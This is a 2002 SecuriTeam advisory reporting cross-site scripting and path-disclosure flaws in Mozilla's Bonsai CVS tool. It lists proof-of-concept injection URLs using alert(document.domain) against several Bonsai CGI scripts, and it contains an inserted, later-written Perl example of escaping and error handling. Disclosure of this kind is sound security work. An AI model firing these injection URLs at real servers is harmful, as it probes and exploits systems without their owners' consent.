[UNIX] Bonsai XSS and Physical Path Revealing Vulnerabilities
From: support@securiteam.com Date: 08/20/02
From: support@securiteam.com To: list@securiteam.com Date: Tue, 20 Aug 2002 09:05:12 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Bonsai XSS and Physical Path Revealing Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.mozilla.org/bonsai.html> Bonsai is a tool that lets you
perform queries on the contents of a CVS archive. The product has been
found to contain multiple cross-site scripting vulnerabilities, and to
contain a vulnerability that would allow an attacker to reveal the
physical path of the Bonsai scripts.
DETAILS
Cross-Site Scripting (CSS) Problems:
/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<scr!pt>alert(document.domain)</script>
/webtools/bonsai/cvslog.cgi?file=<scr!pt>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=/index.html&root=<scr!pt>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=<scr!pt>alert(document.domain)</script>
/cvsquery.cgi?branch=<scr!pt>alert(document.domain)</script>&file=<scr!pt>alert(document.domain)</script>&date=<scr!pt>alert(document.domain)</script>
/cvsquery.cgi?module=<scr!pt>alert(document.domain)</script>&branch=&dir=&file=&who=<scr!pt>alert(document.domain)</script>&sortby=Date&hours=2&date=week
/showcheckins.cgi?person=<scr!pt>alert(document.domain)</script>
/cvsqueryform.cgi?cvsroot=/cvsroot&module=<scr!pt>alert(document.domain)</script>&branch=HEAD
(NOTE: in the URLs above, the letter i in "script" has been replaced with an "!")
Physical Path Revealing and Cross-Site Scripting:
/bonsai/cvslog.cgi?file=/index.html&rev=<scr!pt>alert(document.domain)</script>&root=/cvsroot/
Physical Path Revealing only:
/bonsai/cvsview2.cgi
/bonsai/multidiff.cgi
As the list shows, the problems can be triggered in many ways, although most
of them stem from error-output subroutines, and a few other subroutines, that
do not properly filter input. In some instances the physical paths are
revealed because Perl error messages are (it appears) written directly into
the web page, and those messages carry the full path of the script.
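The two defects described above (unfiltered parameters reflected into the page, and Perl error text reaching the browser) have a common shape in a CGI script. The following is an added illustration, not Bonsai's own code: a minimal Perl CGI that reflects the "file" and "root" parameters named in the advisory. The vulnerable reflection is shown as a comment beside the escaped form, and the fallible file operation (a hypothetical stand-in for whatever Bonsai routine opens a file under the CVS root) is wrapped so that the die() message, which embeds the physical path plus the script name and line number, goes to the server's error log rather than into the response. The html_escape, is_safe_path_component and open_log_file names are assumptions made for this example.

```perl
#!/usr/bin/perl
# Added example, not Bonsai code: a minimal CGI that reflects the "file"
# and "root" parameters the advisory names, escaping them before output
# and keeping Perl die() text (which carries the physical path) off the page.
use strict;
use warnings;
use CGI qw(param header);

# HTML-escape a value before it is interpolated into the response body.
sub html_escape {
    my ($s) = @_;
    $s = '' unless defined $s;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Accept only a conservative character set and no ".." segments, so the
# parameter cannot be used to reach outside the configured CVS root.
sub is_safe_path_component {
    my ($s) = @_;
    return 0 unless defined $s && length $s;
    return 0 if $s =~ m{\.\.};
    return $s =~ m{^[\w./-]+$};
}

# Hypothetical stand-in for a Bonsai routine that opens a file under the
# CVS root. The die() message embeds the full filesystem path and, as
# Perl appends automatically, the script name and line number.
sub open_log_file {
    my ($root, $file) = @_;
    my $path = "$root/$file";
    open(my $fh, '<', $path) or die "Cannot open $path: $!";
    return $fh;
}

print header(-type => 'text/html');

my $file = param('file');
my $root = param('root');

# Vulnerable pattern (what the advisory describes): raw parameters
# reflected into the page, so a <script> tag in either one runs in the
# browser of whoever loads the URL.
#   print "<h1>Log for $file in $root</h1>\n";

# Hardened form: every reflected value passes through html_escape().
print "<h1>Log for ", html_escape($file), " in ", html_escape($root), "</h1>\n";

unless (is_safe_path_component($file) && is_safe_path_component($root)) {
    print "<p>Error: invalid file or root parameter.</p>\n";
    exit 0;
}

# Trap the failure: the complete Perl error (with the physical path) goes
# to STDERR, which the web server collects in its error log; the browser
# receives only a generic message.
my $fh = eval { open_log_file($root, $file) };
if ($@) {
    print STDERR "cvslog error: $@";
    print "<p>Error: the requested log could not be retrieved.</p>\n";
    exit 0;
}

# File contents are untrusted too: escape each line before output.
while (my $line = <$fh>) {
    print "<pre>", html_escape($line), "</pre>\n";
}
close $fh;
```

In a real script the hand-rolled html_escape() can be replaced by CGI.pm's escapeHTML() or HTML::Entities' encode_entities(); the point is that every reflected parameter, and every error string, passes through such a function before it is printed. Note also that enabling CGI::Carp's fatalsToBrowser option does the opposite of the eval block above: it sends the full die() message, path included, to the client, which is exactly the path-disclosure behaviour the advisory reports.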
Vendor notification:
Notification of the vulnerability was sent to the Mozilla team on August
5, 2002. After receiving no response on the matter, Stan Bubrouski sent
another message on August 7 and received a brief response from someone the
same day. The problem still exists on mozilla.org and no changes have been
made to Bonsai CVS to this very day. The fix seems simple, but since Stan
Bubrouski did not have a system to test with, he could not offer a solution.
ADDITIONAL INFORMATION
The information has been provided by <mailto:stan@ccs.neu.edu> Stan
Bubrouski.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.